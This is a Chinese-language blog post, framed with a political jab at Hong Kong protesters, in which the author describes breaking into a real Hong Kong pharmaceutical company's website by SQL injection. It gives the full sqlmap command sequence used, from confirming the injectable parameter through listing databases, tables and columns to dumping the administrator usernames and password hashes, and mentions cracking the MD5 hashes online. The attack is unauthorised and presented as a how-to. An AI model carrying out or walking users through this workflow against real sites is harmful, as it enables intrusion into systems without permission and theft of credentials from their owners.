最近,废青要港独!!!【实战XOX】测试香港某药业注入漏洞_java

于是我随意的在网上找到了中国香港的一个药业网站,起先没什么,也只是看看。突然发现是存在漏洞的!!!

【实战XOX】测试香港某药业注入漏洞_java_02

可以看得出id= 可能存在漏洞

加了一个单引号,页面报错,我也可以确定是存在注入漏洞的

 

【实战XOX】测试香港某药业注入漏洞_java_03

 

看着样子,它可能不存在waf,因为并没有拦截我的单引号

这时候我们就得祭出神器sqlmap

 

【实战XOX】测试香港某药业注入漏洞_java_04

 

开始测试我们的注入点


python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128"

 

这是基本的判断是否存在注入的语句

【实战XOX】测试香港某药业注入漏洞_java_05

 

可以很明确的知道,是存在注入漏洞的。

the back-end DBMS is MySQL

web application technology: Nginx, PHP, PHP  5.6.40 

back-end DBMS: MySQL >= 5.0.12                            


这是详细的信息,既然是mysql数据库。那么接下来我们就得爆出他的数据库!!!因为mysql是有多个数据库的

 

 python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" --dbs

 

执行这个命令== 等待一下即可

【实战XOX】测试香港某药业注入漏洞_java_06

可以看见,只有两个数据库!出乎我意料的少。没事根据我的经验,账号密码肯定存在ajyy这个数据库里面

 

那么,我们就可以开始爆数据库里面的表的内容了

 

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" --tables -D "ajyy"

 

回车执行

 

【实战XOX】测试香港某药业注入漏洞_java_07

 

这一次的表有点多,我就不一一列举出来,但从表中 我看到了dy_admin这个表,所有可以推断这个表存在账号密码,于是 我们开始 下一步

 

 python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" --columns -T "dy_admin" -D "ajyy"

 

开始执行

【实战XOX】测试香港某药业注入漏洞_java_08

 

果然不出我所料,看到username和password,我激动了

因为字段知道了,接下来就是最后一步了

 

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" --dump -C "username,password" -T "dy_admin" -D "ajyy"

 

回车执行

 

【实战XOX】测试香港某药业注入漏洞_java_09

 

很成功的发现了账号密码,不过密码有着md5的加密 ,于是我用了somd5去解密

成功的知道了密码 ,这里我就不发出来,保护网站的隐私